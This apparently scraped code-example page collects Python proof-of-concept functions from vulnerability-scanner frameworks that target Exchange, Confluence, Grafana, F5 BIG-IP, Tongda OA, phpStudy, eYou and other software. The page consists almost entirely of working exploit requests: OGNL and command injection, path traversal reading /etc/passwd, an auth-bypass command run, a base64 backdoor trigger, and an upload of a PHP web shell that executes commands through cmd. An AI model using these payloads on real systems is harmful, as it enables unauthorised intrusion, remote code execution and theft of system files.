Esempi in Python per get_standard_url

Esempio n. 1

def poc(url):
    if not url.startswith("http"):
        url = "https://" + url
    url = get_standard_url(url)
    try:
        r1 = request.get(url + "/owa",
                         timeout=5,
                         verify=False,
                         allow_redirects=False)
        # print(r1.text)
        if r1.status_code != 200:
            return False

        r2 = request.get(
            url +
            "/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]",
            timeout=5,
            verify=False,
            allow_redirects=False)
        if r2.status_code == 200 and "Exchange" in r2.text:
            return True
    except Exception as e:
        # print(e)
        pass

    return False

Esempio n. 2

File: dahua.py Progetto: saucer-man/saucerframe

def poc(url):
    url = get_standard_url(url)
    try:
        r = request.get(f"{url}/current_config/passwd", timeout=10)
        if r.status_code == 200 and "name:passwd" in r.text:
            return True
    except:
        pass
    return False

Esempio n. 3

File: natshell_rce.py Progetto: saucer-man/saucerframe

def poc(url):
    url = get_standard_url(url)
    url = url + "/debug.php"
    try:
        r = request.get(url, timeout=5)
        if r.status_code == 200:
            return True
    except:
        pass
    return False

Esempio n. 4

File: CVE-2022-1388.py Progetto: saucer-man/saucerframe

def poc(url):
    base = get_standard_url(url)
    vuln_url = f"{base}/mgmt/shared/authn/login"
    try:
        r = request.get(vuln_url, verify=False, timeout=5)
        json.loads(r.text)
        if "resterrorresponse" in r.text or "message" in r.text:
            return vuln_url
    except:
        pass
    return False

Esempio n. 5

def poc(url):
    url = get_standard_url(url)
    path = url + "/graph_realtime.php?action=init"
    try:
        # print(path)
        req = request.get(path, timeout=5)
        if req.status_code == 200 and "poller_realtime.php" in req.text:
            return True
        else:
            return False
    except:
        return False

Esempio n. 6

File: CVE-2021-26084.py Progetto: saucer-man/saucerframe

def poc(url):
    try:
        url = get_standard_url(url)
        url = url + "/pages/doenterpagevariables.action"
        paramsPost = {
            "queryString": "aaa\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022]}+\\u0027bbb"}
        headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0",
                   "Content-Type": "application/x-www-form-urlencoded"}
        response = requests.post(url, data=paramsPost,
                                 headers=headers, timeout=5)
        if "aaa{class java.lang.String=null}bbb" in response.text:
            return True
    except:
        pass
    return False

Esempio n. 7

File: thinkcmf_shell.py Progetto: r0ckysec/pocframe

def poc(url):
    headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = get_standard_url(url)
    url = target + url_payload
    try:
        res = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200:
            url2 = target + "/secquan.php"
            res2 = request.get(url2, headers=headers, timeout=5, allow_redirects=False, verify=False)
            if "bug exist" in res2.text:
                return target + "/secquan.php"
    except:
        pass
    return False

Esempio n. 8

File: CVE-2021-43798.py Progetto: saucer-man/saucerframe

def poc(url):
    plugins = [
        "cloudwatch", "dashlist", "elasticsearch", "graph", "graphite",
        "heatmap", "influxdb", "mysql", "opentsdb", "pluginlist", "postgres",
        "prometheus", "stackdriver", "table", "text"
    ]
    base = get_standard_url(url)
    for plugin in plugins:
        vuln_url = f"{base}/public/plugins/{plugin}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd"
        try:
            r = request.get(vuln_url, verify=False, timeout=5)
            if r.status_code == 200 and "root:x:" in r.text:
                return vuln_url
        except:
            pass
    return False

Esempio n. 9

File: discuz_rce.py Progetto: zuihsouse/saucerframe

def poc(url):
    url = get_standard_url(url)
    url = url + "/forum.php"
    try:
        r = request.get(url, timeout=5)
        tmp = re.split(" |=|,", r.headers['Set-Cookie'])
        field = [i for i in tmp if "language" in i]
        if not field:
            return False
        # print(f"{url}:{field}")
        cookie = {field[0]: "'.phpinfo().'"}
        r = request.get(url, cookies=cookie, timeout=5)
        if "PHP Version" in r.text:
            return True
    except:
        return False

Esempio n. 10

def poc(url):
    if not url.startswith("http"):
        url = "https://" + url
    url = get_standard_url(url)
    try:
        vul_url = url + "/owa/auth/x.js"
        headers = {
            'Cookie':
            'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'
        }
        resp = request.get(vul_url, headers=headers, timeout=5, verify=False)
        if resp.status_code == 500 and 'NegotiateSecurityContext' in resp.text:
            return url
    except Exception as e:
        pass

    return False

Esempio n. 11

def poc(url):
    head = {
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Charset':
        'c3lzdGVtKCdlY2hvIHBocHN0dWR5X2JhY2tkb29yX2ZsYWcnKTs='
    }
    target = get_standard_url(url)
    try:
        res = request.get(url=target,
                          headers=head,
                          timeout=5,
                          allow_redirects=False)
        if res.status_code == 200 and res.text.startswith(
                "phpstudy_backdoor_flag"):
            return url
    except:
        pass
    return False

Esempio n. 12

File: eyou.py Progetto: saucer-man/saucerframe

def poc(url):
    if not url.startswith("http"):
        url = "https://" + url
    url = get_standard_url(url)
    vuln_url = url + '/webadm/?q=moni_detail.do&action=gragh'
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = "type='|cat /etc/passwd||'"
    try:
        response1 = requests.post(url=vuln_url,
                                  headers=headers,
                                  data=data,
                                  verify=False,
                                  timeout=5)
        if response1.status_code == 200 and 'root:x:0:0' in response1.text:
            return True

    except Exception as e:
        pass
    return False

Esempio n. 13

File: fw_oa_rce.py Progetto: r0ckysec/pocframe

def poc(url):
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = get_standard_url(url)
    for url_payload in (url_payload1, url_payload2, url_payload3,
                        url_payload4):
        url = target + url_payload
        for data_payload in (data_payload1, data_payload2, data_payload3):
            try:
                res = request.post(url,
                                   data=data_payload,
                                   headers=headers,
                                   timeout=5,
                                   allow_redirects=False)
                if res.status_code == 200 and ";</script>" not in res.text\
                and "Login.jsp" not in res.text and "Error" not in res.text:
                    return url + "\tpayload:" + data_payload
            except:
                pass
    return False

Esempio n. 14

File: fw_sql.py Progetto: r0ckysec/pocframe

def poc(url):
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = get_standard_url(url)
    url = target + url_payload
    for payload in (payload1, payload2):
        try:
            res = request.post(url,
                               data=payload,
                               headers=headers,
                               timeout=5,
                               allow_redirects=False)
            if "系统提醒工作流" in res.text and "403" not in res.text:
                if "@@version" in payload:
                    return target + "\tmssql"
                else:
                    return target + "\toracle"
        except:
            pass
    return False

Esempio n. 15

def poc(host, ports=[]):
    host = get_standard_url(host)
    hosts = url2ip(host)
    result = []
    threads = []
    for host in hosts:
        if ports:
            args = (host, result, ports)
        else:
            args = (
                host,
                result,
            )
        poc_list = ['redis', 'mongo', 'genkins', 'memcached', 'jboss', 'zookeeper', 'rsync', 'couchdb', \
                    'elasticsearch', 'hadoop', 'jupyter', 'docker', 'ftp']
        for p in poc_list:
            threads.append(threading.Thread(target=globals()[p], args=args))

        for t in threads:
            t.start()
        for t in threads:
            t.join()
        return result

Esempio n. 16

File: CVE-2021-22986.py Progetto: saucer-man/saucerframe

def poc(url):
    url = get_standard_url(url)
    path = url + "/mgmt/tm/util/bash"
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0',
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }

    data = json.dumps({'command': 'run', 'utilCmdArgs': '-c id'})
    try:
        r = request.post(url=path,
                         data=data,
                         headers=headers,
                         verify=False,
                         timeout=5)
        if r.status_code == 200 and 'commandResult' in r.text:
            return True
    except Exception as e:
        print(e)
    return False

Esempio n. 17

def poc(url):
    url = get_standard_url(url)
    attack = attack_yapi(url)
    s = requests.Session()
    return attack.verify_yapi(s)

Esempio n. 18

File: tongda_rce.py Progetto: r0ckysec/pocframe

def poc(url):
    try:
        url1 = get_standard_url(url) + '/ispirit/im/upload.php'
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language":
            "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding":
            "gzip, deflate",
            "X-Forwarded-For":
            "127.0.0.1",
            "Connection":
            "close",
            "Upgrade-Insecure-Requests":
            "1",
            "Content-Type":
            "multipart/form-data; boundary=---------------------------27723940316706158781839860668"
        }
        data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
        result = request.post(url1,
                              headers=headers,
                              data=data,
                              timeout=5,
                              verify=False)

        name = "".join(re.findall("2003_(.+?)\|", result.text))
        url2 = get_standard_url(url) + '/ispirit/interface/gateway.php'
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "X-Forwarded-For": "127.0.0.1",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        data = {
            "json":
            "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" %
            (name),
            "f":
            "echo fffhhh"
        }
        result = request.post(url2,
                              headers=headers,
                              data=data,
                              timeout=5,
                              verify=False)
        if result.status_code == 200 and 'fffhhh' in result.text:
            # print("[+] Remote code execution vulnerability exists at the target address")
            return get_standard_url(url)
        else:
            return False
    except:
        pass